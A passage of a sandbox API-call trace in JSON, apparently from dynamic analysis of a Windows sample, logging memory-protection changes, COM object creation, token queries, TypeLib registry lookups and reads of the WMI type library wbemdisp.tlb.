"PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 719 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\sxs" }, { "name": "DllBase", "value": "0x7ffee08c0000" } ], "repeated": 0, "id": 720 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0094b000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 721 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\sxs" }, { "name": "BaseAddress", "value": "0x7ffee08c0000" }, { "name": "InitRoutine", "value": "0x7ffee08f4890" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 722 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee2b48000" }, { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 723 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee2b48000" }, { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 724 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "00000346-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "E085AD58-B839-4625-B40B-4CC546E82D75" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 725 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee2b48000" }, { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 726 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee2b48000" }, { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 727 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020119", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\MACHINE\\Software\\Classes\\PackagedCom" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\PackagedCom" } ], "repeated": 0, "id": 728 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000360" } ], "repeated": 0, "id": 729 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "com", "api": "CoCreateInstanceEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "0000034B-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "ServerName", "value": "" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 730 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "20" }, { "name": "TokenInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 731 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "18" }, { "name": "TokenInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 732 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xc0\\x9d\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\xf0'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x9f\\x7f\\x00\\x00\\x00\\x00\\x00!\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 733 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000364" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\User\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes" } ], "repeated": 0, "id": 734 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000360" } ], "repeated": 0, "id": 735 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000366" }, { "name": "SubKey", "value": "TypeLib" }, { "name": "Handle", "value": "0x00000362" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib" } ], "repeated": 0, "id": 736 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000366" } ], "repeated": 0, "id": 737 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000362" }, { "name": "SubKey", "value": "{565783C6-CB41-11D1-8B02-00600806D9B6}" }, { "name": "Handle", "value": "0x00000366" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}" } ], "repeated": 0, "id": 738 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000366" }, { "name": "SubKey", "value": "1.0" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.0" } ], "repeated": 0, "id": 739 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegEnumKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000366" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "1.2" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2" } ], "repeated": 0, "id": 740 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegEnumKeyExW", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x00000366" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\" } ], "repeated": 0, "id": 741 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000366" }, { "name": "SubKey", "value": "1.2" }, { "name": "Handle", "value": "0x0000036a" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2" } ], "repeated": 0, "id": 742 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x0000036a" }, { "name": "SubKey", "value": "419" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\419" } ], "repeated": 0, "id": 743 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x0000036a" }, { "name": "SubKey", "value": "19" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\19" } ], "repeated": 0, "id": 744 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000036a" }, { "name": "SubKey", "value": "0" }, { "name": "Handle", "value": "0x0000036e" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0" } ], "repeated": 0, "id": 745 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000036e" }, { "name": "SubKey", "value": "win64" }, { "name": "Handle", "value": "0x00000372" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64" } ], "repeated": 0, "id": 746 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" } ], "repeated": 0, "id": 747 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000036e" } ], "repeated": 0, "id": 748 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000036a" }, { "name": "SubKey", "value": "0" }, { "name": "Handle", "value": "0x0000036e" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0" } ], "repeated": 0, "id": 749 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 750 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 751 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xd0\\x96\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00n\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x97\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 752 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64" } ], "repeated": 0, "id": 753 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 754 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000370" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x0000036e" }, { "name": "ObjectAttributesName", "value": "win64" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64" } ], "repeated": 0, "id": 755 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.TLB" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)" } ], "repeated": 0, "id": 756 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" } ], "repeated": 0, "id": 757 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000036e" } ], "repeated": 0, "id": 758 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000036a" } ], "repeated": 0, "id": 759 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000366" } ], "repeated": 0, "id": 760 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000362" } ], "repeated": 0, "id": 761 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 762 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 1, "id": 763 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "Buffer", "value": "MZ\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00" }, { "name": "Length", "value": "64" } ], "repeated": 0, "id": 764 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 765 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 766 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "Buffer", "value": "PE\\x00\\x00" }, { "name": "Length", "value": "24" } ], "repeated": 0, "id": 767 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 768 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\xb0\\x01\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 769 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "Buffer", "value": ".rdata\\x00\\x00\\xb0\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00@" }, { "name": "Length", "value": "40" } ], "repeated": 0, "id": 770 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000364" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\Codepage" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Codepage" } ], "repeated": 0, "id": 771 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000364" }, { "name": "ValueName", "value": "1252" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "c_1252.nls" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\1252" } ], "repeated": 0, "id": 772 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\C_1252.NLS" } ], "repeated": 0, "id": 773 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "Buffer", "value": ".rsrc\\x00\\x00\\x00\\x00\\xe5\\x00\\x00\\x00 